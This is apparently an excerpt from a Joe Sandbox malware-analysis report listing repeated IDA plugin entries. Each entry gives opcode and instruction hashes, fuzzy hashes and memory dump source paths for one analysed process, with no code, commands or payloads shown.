                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ea8c43e61639a8a63e5978f00e43a58cedd430f6cc830d3ace6315e2b6eca441
                                                                  • Instruction ID: 12a8d145208ba033993aefb35cd6e0c347fd0f339976e6af6da826737f719033
                                                                  • Opcode Fuzzy Hash: ea8c43e61639a8a63e5978f00e43a58cedd430f6cc830d3ace6315e2b6eca441
                                                                  • Instruction Fuzzy Hash: 7411A73191990A8FEBA4EF35D4019FA73D0EF55351B40857AD04FC7592CE28F60987A1
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 77599db416cf47b3445d09e3d6077cdcd95a377f9568bc68cb9e43289cdaf1d0
                                                                  • Instruction ID: edca6ec16f1bc400cfb1df6c1ce3ec3b1f26850680c5e99699a0590576e18639
                                                                  • Opcode Fuzzy Hash: 77599db416cf47b3445d09e3d6077cdcd95a377f9568bc68cb9e43289cdaf1d0
                                                                  • Instruction Fuzzy Hash: D811C87190EA498FEB58EB6894556F9B7F0EF4A311F0440BED04EC7582CA28A8058795
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c239afe7ca35c2bae88117d24fd41a5fa428b8093b77e61d1ce3e31a16238d0b
                                                                  • Instruction ID: b9fed0fe05ad46b2b7a7d4a2425bdaba8419a66c6b6ec01d6ff839100892ed15
                                                                  • Opcode Fuzzy Hash: c239afe7ca35c2bae88117d24fd41a5fa428b8093b77e61d1ce3e31a16238d0b
                                                                  • Instruction Fuzzy Hash: 6101C83290FA8A9FF3E4DB6488187B67AE5DF56350F044077D00DEB291CD68A94983A1
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ebd196bcecf39d5fe0d6c6ead17bd1c2d1b063c4ac03416ab2d118c2153e4988
                                                                  • Instruction ID: 9c2c3b3a74c2b843385418a91882c9630c4034e6af06dbeda904004ee44b5b18
                                                                  • Opcode Fuzzy Hash: ebd196bcecf39d5fe0d6c6ead17bd1c2d1b063c4ac03416ab2d118c2153e4988
                                                                  • Instruction Fuzzy Hash: 6911263220A50A8FF7559F28E4156F673D0EF56361F00813AE81EC7AD1CF39EA548791
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05f19c03d813e140eebec9de41586387155f347d47245975066c05229da2bbb5
                                                                  • Instruction ID: 634aadccbfea8feae44d5721ff77118cbe4f8043c0286fee964e7988e3c32911
                                                                  • Opcode Fuzzy Hash: 05f19c03d813e140eebec9de41586387155f347d47245975066c05229da2bbb5
                                                                  • Instruction Fuzzy Hash: A0012631E0AA5DCBF7A58B2844082BF2AD1DF47340F01417AF00EE7291ED68AE4D43D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 27cd3d7254794f6fd0fbc28606d8f268ab62b59829de6765c473f977a3a0ffa9
                                                                  • Instruction ID: b7d882594906d051d4fa60d704398b2f725ed739f3729b01163138cfb4ba8d2f
                                                                  • Opcode Fuzzy Hash: 27cd3d7254794f6fd0fbc28606d8f268ab62b59829de6765c473f977a3a0ffa9
                                                                  • Instruction Fuzzy Hash: 6811443220A50B8FFB549F28D4057F673D0EF66321F00813BE80ECB681CF68A95487A1
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 22341d752da98abab11c8f5fadd36ca739e8f696435e3aaf627fb6bff180069b
                                                                  • Instruction ID: 7f0a14f6624a65b07e456468032525f716134017210f61714b39b244b2690cf8
                                                                  • Opcode Fuzzy Hash: 22341d752da98abab11c8f5fadd36ca739e8f696435e3aaf627fb6bff180069b
                                                                  • Instruction Fuzzy Hash: D8F0C831B0CA088FEB98EB38D40A6B977D1EF89221F00457FE48EC3663CE3598424741
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b97731c42a0a1597e8d3ba753115e2ad94d8b6ba562b82c85c06e6f0a8fac764
                                                                  • Instruction ID: 75506c0ce0b82355472336df0ec9afc2b1b781f46293d93ec27dbecc9178d046
                                                                  • Opcode Fuzzy Hash: b97731c42a0a1597e8d3ba753115e2ad94d8b6ba562b82c85c06e6f0a8fac764
                                                                  • Instruction Fuzzy Hash: 0C01F751C0EA86CBFAE8AF2490155B66B91EF46300B0881BAD00FC25D2ED4CEA4843C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 619380717b354723964036ac0b8c41232554f6f03d21b59e39438b96ec9d1b8b
                                                                  • Instruction ID: 90bfa867a1dfaa21d52cb74a281e3dd4c368efa9658819c063e00b5e2d26b2c3
                                                                  • Opcode Fuzzy Hash: 619380717b354723964036ac0b8c41232554f6f03d21b59e39438b96ec9d1b8b
                                                                  • Instruction Fuzzy Hash: 5B011B7190895D8FDB88EF58C454ABCB7B1FB68300F04407EC00ED7691CA749980CF41
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 938fa70c1c9183399f93fca77224ebcff9bb8c7617b75c0ba220fb74e3f38cf3
                                                                  • Instruction ID: f3c7d396309be1bd2ad09b023dc9973cec7d19ef79045720c6cc1f549d1f03b4
                                                                  • Opcode Fuzzy Hash: 938fa70c1c9183399f93fca77224ebcff9bb8c7617b75c0ba220fb74e3f38cf3
                                                                  • Instruction Fuzzy Hash: 69F0623244E2C59FE3569F7088154F67FA4EF43214F1880E6D44D8B0A2C56D564AC791
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
                                                                  • Instruction ID: e377977eedb8f3761bbb03ccb3c5dbc838c98b922695cf469ebd42ead3dad131
                                                                  • Opcode Fuzzy Hash: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
                                                                  • Instruction Fuzzy Hash: 5A01FA7091992C8FDFA8DF08C894BA9B7B1FB69301F1041DA800EE3690DB31AA84CF41
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5ba30b575e092e8ba3a889d39b76ee65c080a9d81c04afd18675960cbc7cbadc
                                                                  • Instruction ID: aec5ff40f390195f775cb2c2cf661ec3c0233912fa7ba0e06ab78a6e9eb5b6c2
                                                                  • Opcode Fuzzy Hash: 5ba30b575e092e8ba3a889d39b76ee65c080a9d81c04afd18675960cbc7cbadc
                                                                  • Instruction Fuzzy Hash: 82E09A3580E388CFFBA1DF1088560FE7B60BF52300F1842E6D50D06082DE68A71C93C2
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3337fcae80d6df5a85af12ddc4cc5443d92bf4b6482dcc50cb92599892534a09
                                                                  • Instruction ID: 94359c37d46edd507e7104262420a5e2a0482918f5836acdc447c7b0f4d37312
                                                                  • Opcode Fuzzy Hash: 3337fcae80d6df5a85af12ddc4cc5443d92bf4b6482dcc50cb92599892534a09
                                                                  • Instruction Fuzzy Hash: 35D09515A0E547C5FAF94F09802063B22E0AF42304E64803EE0AF41DC68A2DFB09A392
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 61a40d3cf6e15dab64fccae4e4d47597c5b5d6015f0e832f2ad277dff738981f
                                                                  • Instruction ID: 0e9c1206526ba9cc77f393f2838610c211c362e937aeedcae8ce0ffbaeee8bad
                                                                  • Opcode Fuzzy Hash: 61a40d3cf6e15dab64fccae4e4d47597c5b5d6015f0e832f2ad277dff738981f
                                                                  • Instruction Fuzzy Hash: DAD09250E0F603C5F2E86F01816033F52D05F13741E20C4BAC05F598C5C968F7096391